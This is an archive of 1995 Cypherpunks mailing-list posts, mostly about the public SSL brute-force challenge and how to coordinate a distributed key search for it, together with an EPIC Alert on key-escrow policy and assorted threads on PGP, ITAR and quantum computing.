# posted to Cypherpunks on 19 August 1995. 
#
# file checksum (ignoring # comments and whitespace) is 2977

CLEAR-MASTER     fbc009916010a6153f8f36
CHALLENGE        07ea7b9d65eb61fabb4174e8453a5fc6
CONNECTION-ID    d5e638d68ca8a1aeca2ef8c8e29602a4
SERVER-VERIFY    006599b6d2f2a736
-------------------------------------8<-------------------------------------

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sun, 20 Aug 95 22:00:14 PDT
Subject: Re: WhiSSLing in the Dark
In-Reply-To: <199508182201.AAA27435@utopia.hacktic.nl>
Message-ID: <199508210459.OAA03641@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello cypherpunks@toad.com

Anybody get the feeling someone is writing off their computers real fast?

...
> In home computer terms, Doligez guesses a network of
> about 80 Intel Pentium-based machines would be equivalent
...
> at around $10,000, meaning there are many more economical
...


Okay,
  80 Pentiums, at 2000 each, makes 160 000.
  8 days per attack, 10 000 per attack, makes cost of attack 1250/day

  160 000 / 1 250 = 128 days.

Anybody's Pentiums actually wear out after half a year?

You could question my 2000 figure, but even at 5000 it'd still be just
a year. Cost of capital doesn't change by more than 10% in that time.


Hope I'm making sense... and sorry about flogging the dead horse...

Jiri
--
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 21 Aug 95 12:29:22 PDT
To: wilcoxb@nagina.cs.colorado.edu
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <199508211856.MAA08294@nagina.cs.colorado.edu>
Message-ID: <9508211920.AA27347@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Mon, 21 Aug 1995 12:56:21 -0600
>From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>


>Thanks again, and I hope you go ahead and start PGP-clearsigning your posts

Yes, I've been remiss.  It's an old belief -- that signing is expensive.
Now that I'm using emacs extensions and RMAIL, it's really easy -- but I
still follow the old habit.

We really need mailers with auto-cryptography!  (as easy as in Lotus Notes)

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDjcS1QXJENzYr45AQEgAwP/RWusaK/C4bcFVaSGRa6WXrrfJMAeeVXL
s5E221rx3POtKr6Nq+TZnlFs5uaian8u1XvCCApYEIPdYAcWIUtJJAp5soLhOyi7
ceF8slVJisYyexj1Zo5qHoOV+ajg/YZeRxL72ofQXF4gdsSbGUp4B6nE/ncRp2S+
nnKZyutOo4A=
=b09P
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert Zach" <ZACH@sesd.ilex.com>
Date: Mon, 21 Aug 95 13:24:34 PDT
To: cypherpunks@toad.com
Subject: Makes the News! (Was Re: SSL Broken)
Message-ID: <A231DA12C7@sesd.ilex.com>
MIME-Version: 1.0
Content-Type: text/plain


The first trade mag article I have seen on the Subject has been 
delivered to my doorstep!!

Check out COMMUNICATIONS WEEK August 21
PAGE 1

FYI
-Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Mon, 21 Aug 95 13:19:13 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: NSA into antigravity?
In-Reply-To: <199508190533.WAA14801@netcom16.netcom.com>
Message-ID: <Pine.SUN.3.91.950821161632.18939A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 18 Aug 1995, Vladimir Z. Nuri wrote:

> >On July 19, Gerald Ollman and Robert Wayne, two researchers from the
> >University of Maryland geophysics department were detained in Fort Meade,

Neither Ollman nor Wayne have umail accounts (which every faculty member 
gets), so I think it is very possible that these people do not exist.

-Thomas Edwards





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Mon, 21 Aug 95 13:49:40 PDT
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: EPIC Alert 2.09
Message-ID: <n1403098783.52049@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


     =============================================================
      
        @@@@  @@@@  @@@  @@@@      @    @     @@@@  @@@@  @@@@@
        @     @  @   @   @        @ @   @     @     @  @    @
        @@@@  @@@    @   @       @@@@@  @     @@@   @@@     @
        @     @      @   @       @   @  @     @     @  @    @
        @@@@  @     @@@  @@@@    @   @  @@@@  @@@@  @   @   @

     =============================================================
     Volume 2.09                                   August 21, 1995
     -------------------------------------------------------------

                         Published by the
           Electronic Privacy Information Center (EPIC)
                          Washington, DC
                          info@epic.org
                       http://www.epic.org

                    *Special Edition: Crypto*

=======================================================================
Table of Contents 
=======================================================================
  
 [1] "New" Crypto Policy Announced: Clipper II?
 [2] NIST Announcement on Key-Escrow Workshops
 [3] Documents: FBI & NSA Want to Ban Non-Escrowed Encryption
 [4] EPIC Crypto Web Pages Online	
 [5] Upcoming Conferences and Events

=======================================================================
[1] "New" Crypto Policy Announced: Clipper II?
=======================================================================

The Clinton Administration ended a year of silence on August 17 when
it issued a long-awaited statement on the Clipper Chip and key-escrow
encryption.  Unfortunately, the "new" policy is merely a re-working of
the old one -- the Administration remains committed to key-escrow
techniques that ensure government agents access to encrypted
communications.  The only changes are a willingness to consider the
export of 64-bit encryption (if "properly escrowed"), the possibility
of private sector escrow agents to serve as key-holders, and
consideration of software implementations of key-escrow technologies.

As EPIC Advisory Board member Whit Diffie observed in an op-ed piece
in the New York Times, the new approach won't work.  "While other
nations may share our interest in reading encrypted messages for law
enforcement purposes, they are unlikely to embrace a system that
leaves them vulnerable to U.S. spying.  They will reject any system
that gives decoding ability to agents in the United States."  Diffie
further notes that "64-bit keys are not expected to be adequate."

In a statement re-printed below, the National Institute of Standards
and Technology (NIST) announced two public workshops "to discuss key
escrow issues."  More information concerning these meetings can be
obtained from Arlene Carlton at NIST, (301) 975-3240, fax: (301)
948-1784, e-mail: carlton@micf.nist.gov.

=======================================================================
[2] NIST Announcement on Key-Escrow Workshops
=======================================================================

EMBARGOED FOR RELEASE:                  NIST 95-24
3 p.m. EDT, Thursday, Aug. 17, 1995

Contact:  Anne Enright Shepherd         COMMERCE'S NIST ANNOUNCES
          (301) 975-4858                PROCESS FOR DIALOGUE ON
                                        KEY ESCROW ISSUES

     Furthering the Administration's commitment to defining a
workable key escrow encryption strategy that would satisfy
government and be acceptable to business and private users of
cryptography, the Commerce Department's National Institute of
Standards and Technology announced today renewed dialogue on key
escrow issues.

     A Sept. 6-7 workshop will convene industry and government
officials to discuss key escrow issues, including proposed
liberalization of export control procedures for key escrow
software products with key lengths up to 64 bits, which would
benefit software manufacturers interested in building secure
encryption products that can be used both domestically and
abroad.

     Key escrow encryption is part of the Administration's
initiative to promote the use of strong techniques to protect the
privacy of data and voice transmissions by companies, government
agencies and others without compromising the government's ability
to carry out lawful wiretaps.

     In a July 1994 letter to former Rep. Maria Cantwell, Vice
President Gore said that the government would work on developing
exportable key escrow encryption systems that would allow escrow
agents outside the government, not rely on classified algorithms,
be implementable in hardware or software, and meet the needs of
industry as well as law enforcement and national security.  Since
that time, discussions with industry have provided valuable
guidance to the Administration in the development of this policy.
For example, many companies are interested in using a corporate
key escrow system to ensure reliable back-up access to encrypted
information, and the renewed commitment should foster the
development of such services.

     Consideration of additional implementations of key escrow
comes in response to concerns expressed by software industry
representatives that the Administration's key escrow policies did
not provide for a software implementation of key escrow and in
light of the needs of federal agencies for commercial encryption
products in hardware and software to protect unclassified
information on computer and data networks.

     Officials also announced a second workshop at which industry
is invited to help develop additional Federal Information
Processing Standards for key escrow encryption, specifically to
include software implementations.  This standards activity would
provide federal government agencies with wider choices among
approved key escrow encryption products using either hardware or
software.  Federal Information Processing Standards provide
guidance to agencies of the federal government in their
procurement and use of computer systems and equipment.

     Industry representatives and others interested in joining
this standards-development effort are invited to a key escrow
standards exploratory workshop on Sept. 15 in Gaithersburg, Md.
This workshop is an outgrowth of last year's meetings in which
government and industry officials discussed possible technical
approaches to software key escrow encryption.

     The Escrowed Encryption Standard, a Federal Information
Processing Standard for use by federal agencies and available for
use by others, specifies use of a Key Escrow chip (once referred
to as "Clipper chip") to provide strong encryption protection for
sensitive but unclassified voice, fax and modem communications
over telephone lines.  Currently, this hardware-based standard is
the only FIPS-approved key escrow technique.  NIST officials
anticipate proposing a revision to the Escrowed Encryption
Standard to allow it to cover electronic data transmitted over
computer networks.  Under this revised federal standard, the
Capstone chip and other hardware-based key escrow techniques
developed for use in protecting such electronic data also will be
approved for use by federal agencies.

     As a non-regulatory agency of the Commerce Department's
Technology Administration, NIST promotes U.S. economic growth by
working with industry to develop and apply technology,
measurements and standards.

=======================================================================
[3] Documents: FBI & NSA Want to Ban Non-Escrowed Encryption
=======================================================================

On a related note ...

Declassified government documents recently obtained by EPIC show 
that key federal agencies concluded more than two years ago that the 
"Clipper Chip" key-escrow initiative will only succeed if alternative 
security techniques are outlawed.  The information is contained in 
several hundred pages of material concerning Clipper and cryptography 
EPIC obtained from the FBI under the Freedom of Information Act.  

The conclusions contained in the documents appear to conflict 
with frequent Administration claims that use of key-escrow technology 
will remain "voluntary."  Critics of the government's initiative, 
including EPIC, have long maintained that government-sanctioned key-
escrow encryption techniques would only serve their stated purpose if 
made mandatory.  According to the FBI documents, that view is shared by 
the Bureau, the National Security Agency (NSA) and the Department of 
Justice (DOJ).

In a "briefing document" titled "Encryption: The Threat, 
Applications and Potential Solutions," and sent to the National 
Security Council in February 1993, the FBI, NSA and DOJ concluded that:

   Technical solutions, such as they are, will only work if 
   they are incorporated into *all* encryption products.  To 
   ensure that this occurs, legislation mandating the use of   
   Government-approved encryption products or adherence to 
   Government encryption criteria is required.

Likewise, an undated FBI report titled "Impact of Emerging 
Telecommunications Technologies on Law Enforcement" observes that 
"[a]lthough the export of encryption products by the United States is 
controlled, domestic use is not regulated."  The report concludes that 
"a national policy embodied in legislation is needed."  Such a policy, 
according to the FBI, must ensure "real-time decryption by law 
enforcement" and "prohibit[] cryptography that cannot meet the 
Government standard."

The FBI conclusions stand in stark contrast to public assurances 
that the government does not intend to prohibit the use of non-
escrowed encryption.  Testifying before a Senate Judiciary 
Subcommittee on May 3, 1994, Assistant Attorney General Jo Ann 
Harris asserted that:

   As the Administration has made clear on a number of occasions,
   the key-escrow encryption initiative is a voluntary one; we 
   have absolutely no intention of mandating private use of a 
   particular kind of cryptography, nor of criminalizing the 
   private use of certain kinds of cryptography.

The newly-disclosed information suggests that the architects of 
the key-escrow program -- NSA and the FBI -- have always recognized 
that key-escrow must eventually be mandated.  Coming to light on the 
eve of the announcement of a "new" Administration policy, the FBI 
documents raise significant questions as to the government's long-term 
strategy on the cryptography issue. 

Scanned images of several key documents are available via the 
World Wide Web at http://www.epic.org/crypto/ban/fbi_dox/

=======================================================================
[4] EPIC Crypto Policy Web Pages Online	
=======================================================================

EPIC is now making available an extensive series of pages on
cryptography policy.  Each page highlights an area of controversy and
provides links to key documents.  Materials include formerly secret
government documents obtained under FOIA by EPIC and CPSR, reports
from the Office of Technology Assessment, the General Accounting
Office and others on cryptography. Topics include:

	o Efforts to ban cryptography
	o The Clipper Chip
	o The Digital Signature Standard
	o The Computer Security Act of 1987

The pages are available at http://www.epic.org/crypto/   More pages 
will become available soon.

=======================================================================
[5] Upcoming Privacy Related Conferences and Events
=======================================================================

Advanced Surveillance Technologies. Sept. 4, 1995. Copenhagen,
Denmark. Sponsored by Privacy International and EPIC. Contact
pi@privacy.org. http://www.privacy.org/pi/conference/

17th International Conference of Data Protection and Privacy
Commissioners. Copenhagen, Denmark. September 6-8, 1995. Sponsored by
the Danish Data Protection Agency. Contact Henrik Waaben, +45 33 14 38
44 (tel), +45 33 13 38 43 (fax).

InfoWarCon '95. September 7-8, 1995. Arlington, VA. Sponsored by NCSA
and OSS. Email: 74777.3033@compuserve.com.

Business and Legal Aspects of Internet and Online Services. Sept. 
14-15. New York City. Sponsored by National Law Journal and New York 
Law Journal. Contact: (800)888-8300, ext. 6111, or (212)545-6111.

The Good, the Bad, and the Internet: A Conference on Critical Issues
in Information Technology. October 7-8. Chicago, Ill. Sponsored by
CPSR. Contact cpsr@cpsr.org or
http://www.cs.uchicago.edu/discussions/cpsr/annual

18th National Information Systems Security Conference. Oct. 10-13. 
Baltimore, MD. Sponsored by NSA and NIST. Contact: 301-975-3883.

Managing the Privacy Revolution. Oct. 31 - Nov. 1, 1995. Washington,
DC. Sponsored by Privacy & American Business. Speakers include Mike
Nelson (White House) C.B. Rogers (Equifax) and Marc Rotenberg (EPIC).
Contact Alan Westin 201/996-1154.

22nd Annual Computer Security Conference and Exhibition. Nov. 6-8, 
Washington, DC. Sponsored by the Computer Security Institute. 
Contact: 415-905-2626.

Global Security and Global Competitiveness: Open Source Solutions.
Nov. 7-9. Washington, D.C. Sponsored by OSS. Contact: Robert Steele
oss@oss.net.

11th Annual Computer Security Applications Conference: Technical
papers, panels, vendor presentations, and tutorials that address the
application of computer security and safety technologies in the civil,
defense, and commercial environments. Dec. 11-15, 1995, New Orleans,
Louisiana. Contact Vince Reed at (205)890-3323 or vreed@mitre.org.

Computers Freedom and Privacy '96. March 27-30. Cambridge, Mass.
Sponsored by MIT, ACM and WWW Consortium. Contact cfp96@mit.edu or
http://www-swiss.ai.mit.edu/~switz/cfp96

Australasian Conference on Information Security and Privacy June
24-26, 1996. New South Wales, Australia. Sponsored by Australasian
Society for Electronic Security and University of Wollongong. Contact:
Jennifer Seberry (jennie@cs.uow.edu.au).

             (Send calendar submissions to Alert@epic.org)

=======================================================================

The EPIC Alert is a free biweekly publication of the Electronic
Privacy Information Center.  To subscribe, send the message:

    SUBSCRIBE CPSR-ANNOUNCE Firstname Lastname

to listserv@cpsr.org.  You may also receive the Alert by reading the
USENET newsgroup comp.org.cpsr.announce.

Back issues are available via http://www.epic.org/alert/ or
FTP/WAIS/Gopher/HTTP from cpsr.org /cpsr/alert/ and on Compuserve (Go
NCSA), Library 2 (EPIC/Ethics).


=======================================================================

The Electronic Privacy Information Center is a public interest
research center in Washington, DC.  It was established in 1994 to
focus public attention on emerging privacy issues relating to the
National Information Infrastructure, such as the Clipper Chip, the
Digital Telephony proposal, medical record privacy, and the sale of
consumer data.  EPIC is sponsored by the Fund for Constitutional
Government and Computer Professionals for Social Responsibility. EPIC
publishes the EPIC Alert and EPIC Reports, pursues Freedom of
Information Act litigation, and conducts policy research on emerging
privacy issues. For more information, email info@epic.org, WWW at
HTTP://www.epic.org or write EPIC, 666 Pennsylvania Ave., SE, Suite 
301, Washington, DC 20003. (202) 544-9240 (tel), (202) 547-5482 (fax).

The Fund for Constitutional Government is a non-profit organization
established in 1974 to protect civil liberties and constitutional
rights.  Computer Professionals for Social Responsibility is a
national membership organization of people concerned about the impact
of technology on society.  For information contact: cpsr-info@cpsr.org

If you'd like to support the work of the Electronic Privacy
Information Center, contributions are welcome and fully
tax-deductible.  Checks should be made out to "The Fund for
Constitutional Government" and sent to EPIC, 666 Pennsylvania Ave.,
SE, Suite 301, Washington DC 20003.

Your contributions will help support Freedom of Information Act
litigation, strong and effective advocacy for the right of privacy and
efforts to oppose government regulation of encryption and funding of
the National Wiretap Plan..

Thank you for your support.

------------------------ END EPIC Alert 2.09 ------------------------




_________________________________________________________________________
Subject: EPIC Alert 2.09
_________________________________________________________________________
David Banisar (Banisar@epic.org)        *  202-544-9240 (tel)
Electronic Privacy Information Center   *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://epic.org
Washington, DC 20003                    *  ftp/gopher/wais cpsr.org 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas M. Swiss" <tms@TIS.COM>
Date: Mon, 21 Aug 95 13:54:48 PDT
To: cypherpunks@toad.com
Subject: interesting quote, Baltimore Sun 8/21
Message-ID: <199508212050.QAA05657@ziggy.tis.com>
MIME-Version: 1.0
Content-Type: text/plain



     Page 7A of today's _Baltimore Sun_ features an op-ed piece by Carl
R. Eisendrath, "a former U.S. foreign-service officer", entitled "Bringing
Light to Covert Operations", which cites an interesting quotation:

     "In the period between the two world wars, Secretary of War Henry
      Stimson closed the cryptography section of the State Department
      because, as he reputedly said, "Gentlemen don't read each other's
      mail."

-Tom Swiss / tms@tis.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Mon, 21 Aug 95 08:12:39 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
Message-ID: <9508211509.AA04027@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> The car system used here in the U.S. is called "Lo-Jack," as in the
> opposite of "hijack." I don't see how putting the transponders in ignition
> keys would do much to stop theft, but maybe I'm unaware of European
> developments. (There are keys with chips in them, acting as electronic
> keys, or to make the keys harder to duplicate, but not to track the cars.)

The computer which controls the engine checks whether there is a transponder
in the ignition key. The key sends a 32 bit ID number. If this number was
registered in the computer, the engine works, otherwise not. You can't start
the engine just by shortcutting some wires.



> >Perhaps a drug dealer may be more usefull if he moves free and
> >has a transponder inside which he doesn't know about, that having
> >him in jail.

[ This should have been "than having him...". I was very tired yesterday
 evening. It's embarrassing to see how many typos I made :-( ]


> Implausible. The theft detectors are not picking up specific transponders,
> just the "on" or "off" state of the things attached to clothing, books,
> CDs, etc. (I say "things" because some of them are strips inserted in
> books, some are tag-like things clamped to clothing, etc.)

No, the theft detectors don't. But they are big and unsuspicious enough to
hide specific detectors for big brothers...



> Again, the infrastructure is lacking. The simple detectors in stores would
> have to be upgraded to track more sophisticated transponders. The stores
> would have to cooperate, etc. Implausible.

Why implausible? Stores cooperate. I know about a big department store in 
Germany (but I don't tell you which one) which has a large secret military
hospital and a medical stock below it's basement. None of the employees
knows about. If they cooperate in having a complete hospital inside, why
shouldn't they cooperate in having some antennas and some wires?

Hadmut





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 21 Aug 95 09:30:47 PDT
To: cypherpunks@toad.com
Subject: NEXT CHALLENGE: plan of action?
Message-ID: <25403.9508211621@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



[First please moderate my previous couple of postings with the
knowledge that they may (if they even got out) have been hanging in
suspended animation for ~40 hours due to stuffed mail server, and some
things have changed since then.]

I've been out of things for a couple of days due to aforementioned
dead mailer.  All's well now (well it's croaking along passably
anyway).

Just posted a config file for Hals 2nd challenge, which Alex Tang
<altitude@cic.net> has kindly checked.

I read on Saturday Ian Goldbergs post about starting out on the
challenge using Damiens code.

It doesn't matter a great deal which code is used as such, but the
main thing is to ensure that this is a coordinated effort.  The aim of
the challenge (which I requested and Hal kindly provided just before
popping off for a week or so's holiday) was to see how fast a SSL
challenge could be broken.  Not how *soon*, note the distinction.

That means that if for instance we count the time that Ian has been
clocking up since Saturday, the real time will be slowed by approx 2
days.  We really need to do this with a starting-line like affair, so
that someone is running a server, and everyone gets the code compiled
etc, and then the server starts offering the challenge and all the
clients fire off.

That way we have a less straggly start up which makes for better
bruteing figures.

Agreed so far?


If so here's my ideas...


Use Andrew Roos client & Piete's socket server / WWW client for the
reason that this combination has been designed to operate both an
automated sockets master / slave system and offer manual key
allocation over WWW for those without direct connectivity, or behind
firewalls.

All of the software for this system is indexed from the URL:

	http://www.brute.cl.cam.ac.uk/brute/
or	ftp://ftp.brute.cl.cam.ac.uk/pub/brute/

The socket server running SKSP protocol (more ont he protocol later)
is at this address:

	sksp.brute.cl.cam.ac.uk 19957

(ie port no 19957)


The clients are setup to use this address by default in any case.  The
WWW based key doler is indexed from the WWW page above:

	http://www.brute.cl.cam.ac.uk/brute/

and this (transparently) interacts with the socket server also, so WWW
users can via a WWW forms interface take out keyspace to sweep, and
return the keyspace after sweeping.


The SKSP (Simple Key Searching Protocol) is described in an RFC like
document available here:

	http://www.brute.cl.cam.ac.uk/ftp/pub/brute/protocol.txt

for anyone wishing to write clients for other platforms, or with more
advanced features, or for those simply wishing to know what language
the client is talking.


Where to find things...

The brutessl software, the unix socket client, and the Windows NT
client are on:

	http://www.brute.cl.cam.ac.uk/brute/

Also I have put an untarred version of the brutessl code here:

	http://dcs.ex.ac.uk/~aba/brutessl/

(individual files untarred).

If and when people compile binaries for architectures which don't
typically come with compilers by default - such as DOS, OS/2, Macs,
I'll put any binaries sent to me in this directory, and / or send to
Piete for a pointer to this repository, or copying to brute.cl.


UNIX client.

How to use the unix client...  download brclient from the www page:

	http://www.brute.cl.cam.ac.uk/brute/

it is a perl program so you may have to edit the path to perl (the 1st
line of the program should be #!/full/path/to/perl/binary), and you
will have to mark it as executable.

You will also need a shell script called brloop which uses brclient.
It is on Piete's "sources" page, this page is indexed from the main
brute page above, here it is explicitly.

	http://www.brute.cl.cam.ac.uk/ftp/pub/brute/README.html

So get brloop.

Get and compile the brutessl.tar.gz file.

Run brloop.

The brclient perl socket client talks to a machine with a DNS:

	sksp.brute.cl.cam.ac.uk on port number 19957

At the moment the server is running and will ask your client to sleep,
as the challenge has not been started yet.  When Piete starts it up,
your client will periodically ask for work, before the start time
(Tue 12:00 GMT, or later time if this time is changed) your client
will just be told to sleep for a while, when it wakes up it will ask
for work again.  In this way the client can be left ticking over, when
work does arrive it will notice, as it will actually recieve some work
when it makes the request, and start doing it, and reporting back when
it finishes each chunk.

There is a windows NT socket client written by Andrew Brown, pointers
to that also.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Mon, 21 Aug 95 14:26:21 PDT
To: ethridge@Onramp.NET (Allen B. Ethridge)
Subject: Re: Newton 2
In-Reply-To: <v02130500ac5e436d94d4@[199.1.11.207]>
Message-ID: <199508212124.RAA28766@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> I've heard a few times that not having a C compiler prevents the
> implementation of PGP.  Why?  Do the RSA people refuse to license a
> non-C implementation.  If so, can they still enforce their patent
> against someone who implemented it on a platform that didn't have a C
> compiler?

The problem is that PGP needs to be compiled from its C sources into a
binary.  The problem is not RSA not licensing; the problem is that PGP
(and all the support routines, including RSA) is implemented in C.
Therefore, if you do not have a C compiler, you cannot turn the
sources into a binary.

If you don't have a c compiler, you could re-implement PGP, but it
would be a lot of work, and you would still have the RSA patent
issues.  Also, it is against the RSAREF license to convert RSAREF into
another language, so you can't take that route, either.

The easiest way to port PGP to a new platform is to get a C compiler
for that platform.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Mon, 21 Aug 95 14:41:46 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Third World Man
In-Reply-To: <ac5d49b804021004ff37@[205.199.118.202]>
Message-ID: <199508212141.RAA03543@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Strong cryptography is needed for a secure information
infrastructure.  If American companies aren't allowed to build secure
infrastrucure, then parts of the infrastrucure will move overseas, as
insurance, liability, and deployment costs rise for a badly secured
network.

	This issue will not cause the USA to become a third world
nation, but it will contribute to large institutions moving their data
processing out.  Tim, you've talked a lot about how companies will
move data centers out of the US to avoid 'expensive' laws; do you see
the ITARs as being in a different catagory, than say, the laws on
reporting a bankruptcy?

Adam

Tim May wrote:

| At 9:19 PM 8/20/95, Adam Shostack wrote:
| >        No.  Banning strong crypto will not help; those darn furriners
| >are using it anyway.  What it will mean is that the Information
| >Infrastructure of the future will bypass the United States, as without
| >strong cryptography, it is impossible to build a secure architechture.
| >
| >        Should the United States wish to relagate itself to the status
| >of a third world nation becuase of terrorists, druge dealers, child
| >pornorgaphers and money launderers, that is indeed unfortunate.
| 
| The U.S. is not likely to find itself relegated to third world status over
| this issue. Rhetorically, I wish it were so, but it just ain't. This
| issue--like the McCarthy hearings in the 1950s, the race issue in the '60s,
| the Vietnam war in the '60s and '70s, to name a few cases, _sounds_ really
| serious. And it is, as those cases were, but predicting the imminent
| collapse of American civilization is usually a lose.
| 
| There is no way the technologlcal and manufacturing prowess of leading
| American companies will be substantially crippled.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 21 Aug 95 18:14:42 PDT
To: cypherpunks@toad.com
Subject: Re: Third World Man
Message-ID: <ac5e7d620c0210040220@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:41 PM 8/21/95, Adam Shostack wrote:
>        Strong cryptography is needed for a secure information
>infrastructure.  If American companies aren't allowed to build secure
>infrastrucure, then parts of the infrastrucure will move overseas, as
>insurance, liability, and deployment costs rise for a badly secured
>network.
>
>        This issue will not cause the USA to become a third world
>nation, but it will contribute to large institutions moving their data
>processing out.  Tim, you've talked a lot about how companies will
>move data centers out of the US to avoid 'expensive' laws; do you see
>the ITARs as being in a different catagory, than say, the laws on
>reporting a bankruptcy?

Sure, they will move some parts of their operations to other jurisdictions.
They already are, for various reasons. Most large U.S. companies are of
course "multinationals."

I didn't cite examples, and won't now. (But you can imagine a few of the
many successful U.S. companies: Sun, Intel, Microsoft, SGI, Qualcomm,
Altera, Merck, and on and on.)

I am not saying that things are as they should be. And I am not a U.S.
chauvinist. I really don't care which countries do well, so long as my
investments continue to do well.

My point was that hyperbole about the U.S. being on the verge of becoming a
Third World nation is wrong. As Sternlight might put it, "arrant nonsense."

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 21 Aug 95 18:19:04 PDT
To: cypherpunks@toad.com
Subject: Quantum Computers for the 12th Time
Message-ID: <ac5e7f1f0d0210046adb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:00 PM 8/21/95, J. Kent Hastings wrote:

>Doesn't quantum coherence require molecular precision if it
>is to work on 1024 bit PGP keys? If it works, such keys can
>be instantly factorized. It would be nice to follow that progress.
>
>If human engineered molecular nano works, we'll have much
>more than PGP to worry about. Copies of copies of
>replicating disassemblers could rip the Earth apart in three
>days, assuming doubling every 20 minutes like bacteria,
>but not limited to proteins.
>
>That would have a big impact on digital cash networks!

I urge all those interested in quantum computers to consult the CP
archives. Also, my FAQ has a couple of pages on it. Grep for the main
topic, or for Shor.

This comes up every 3-4 months and produces the same speculations.

I think nanotech and quantum computers have even less to do with real
concerns than Waco and Foster do.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Mon, 21 Aug 95 18:40:36 PDT
To: Carl Ellison <cme@tis.com>
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <9508211920.AA27347@tis.com>
Message-ID: <199508220140.TAA12229@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> >Thanks again, and I hope you go ahead and start PGP-clearsigning your posts
> 
> Yes, I've been remiss.  It's an old belief -- that signing is expensive.
> Now that I'm using emacs extensions and RMAIL, it's really easy -- but I
> still follow the old habit.
> 
> We really need mailers with auto-cryptography!  (as easy as in Lotus Notes)


I have a pretty easy-to-use set-up...


Not to seem picky or anything, but now that I have a clearsigned message
from you, I need your public key in order to verify it.   :-)


Regards,

Bryce

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMDk1evWZSllhfG25AQGEVgP9HKxRWdvroE1KdMUEI7zAogwVpeViLaL0
v2Al/lJQIjqiUKFASFuFw6zfR/5d3myL3mhJ0b7Yb/mu2u4wj2zIrmui+8h8qBmw
+L2GoeJFnOVrkX32Dt9uZ6ckS66hbSDkYQ6rVY2dTii8lszPjEC7f6gE7/fl8Ky0
zC/f2+pUUko=
=Q0tW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Mon, 21 Aug 95 18:47:07 PDT
To: wilcoxb@cs.colorado.edu
Subject: No Subject
Message-ID: <199508220146.TAA12445@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Here is an article that I just posted to alt.security.pgp and sci.crypt.
